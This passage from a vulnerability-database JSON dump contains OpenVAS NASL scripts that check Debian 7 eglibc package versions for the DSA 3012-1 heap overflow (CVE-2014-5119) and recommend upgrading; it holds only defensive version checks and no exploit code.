isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", 
rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) 
{\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif 
((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", 
ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", 
ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", 
ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:12", "bulletinFamily": "scanner", "description": "Tavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian", "modified": "2019-03-19T00:00:00", "published": "2014-08-27T00:00:00", "id": "OPENVAS:1361412562310703012", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703012", "title": "Debian Security Advisory DSA 3012-1 (eglibc - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3012.nasl 14302 2019-03-19 08:28:48Z cfischer $\n# Auto-generated from advisory DSA 3012-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text 
descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703012\");\n script_version(\"$Revision: 14302 $\");\n script_cve_id(\"CVE-2014-5119\");\n script_name(\"Debian Security Advisory DSA 3012-1 (eglibc - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-19 09:28:48 +0100 (Tue, 19 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-08-27 00:00:00 +0200 (Wed, 27 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2014/dsa-3012.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"eglibc on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy), this problem has been fixed 
in\nversion 2.13-38+deb7u4.\n\nWe recommend that you upgrade your eglibc packages.\");\n script_tag(name:\"summary\", value:\"Tavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian's version of the\nGNU C Library. As a result, an attacker who can supply a crafted\ndestination character set argument to iconv-related character\nconversion functions could achieve arbitrary code execution.\n\nThis update removes support of loadable gconv transliteration modules.\nBesides the security vulnerability, the module loading code had\nfunctionality defects which prevented it from working for the intended\npurpose.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", 
rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", 
rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:49", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120169", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120169", "title": "Amazon Linux Local Check: ALAS-2015-495", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2015-495.nasl 6575 2017-07-06 13:42:08Z cfischer$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR 